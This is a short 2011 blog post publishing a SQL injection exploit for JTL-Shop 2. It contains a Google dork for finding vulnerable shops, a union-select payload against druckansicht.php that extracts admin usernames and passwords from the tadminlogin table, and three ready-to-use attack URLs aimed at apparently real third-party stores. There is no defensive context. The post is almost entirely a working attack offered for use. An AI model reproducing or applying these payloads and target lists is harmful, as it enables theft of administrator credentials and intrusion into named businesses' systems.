Monday, April 4, 2011


JTL Shop 2 Remote SQL Injection Exploit

# Vendor: www.jtl-software.de
# Version: 2

Google dork : inurl:druckansicht.php?s=  intitle: JTL-Shop2


POC :
druckansicht.php?s=13 and 1=2 union select 1,2,3,4,5,concat(cName,0x3a,cPass),7,8,9 from tadminlogin--

Target Found :

http://test.jtl-shop.de/schlebert/druckansicht.php?s=13%20and%201=2%20union%20select%201,2,3,4,5,concat(cName,0x3a,cPass),7,8,9%20from%20tadminlogin--
http://lifestyle.newco4you.de/druckansicht.php?s=13%20and%201=2%20union%20select%201,2,3,4,5,concat(cName,0x3a,cPass),7,8,9%20from%20tadminlogin--
http://www.tng-equipment.de/JTL-Shop2/druckansicht.php?s=13%20and%201=2%20union%20select%201,2,3,4,5,concat(cName,0x3a,cPass),7,8,9%20from%20tadminlogin--  

This Share Facebook Posted by at 2:16 AM

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)
Template by : mhiman@ hacker-newbie.org